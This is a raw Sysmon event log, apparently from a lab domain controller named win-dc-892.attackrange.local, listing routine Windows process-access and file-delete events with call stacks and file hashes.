12:02:26.944{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64D2-6064-B500-00000000AE01}5416C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000006206Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.929{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9AEF85C924CADACD198C2D00D4E27A5F,SHA256=B843ED9DEFA57CB524D004BDEBD826888579D6229781246A0952775AFF8FA0B8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000006205Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.929{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=431CECC3AA1069DC341B4E83AD855352,SHA256=E3F724DBF0892EDD6FBFEA962B5A9735C61FE958FD44E349CB56CD45462044D1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000006204Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.866{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6244AB059F68D754A8699920BDEC7B10,SHA256=CE47DA81DBD665CF55B456144701B2ED4D84D29D6827DCA2EC864412FBFCCD05,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000006203Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.757{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006202Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.757{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006201Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.757{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006200Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.757{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006199Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.742{266CAFBE-64C4-6064-9E00-00000000AE01}31204072C:\Windows\system32\taskhostw.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006198Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.742{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006197Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.742{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006196Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.477{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006195Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.477{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006194Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.461{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006193Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.461{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006192Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.306{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006191Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.290{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006190Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.290{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006189Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.290{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006188Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.275{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006187Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.275{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006186Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.275{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006185Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.275{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006184Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 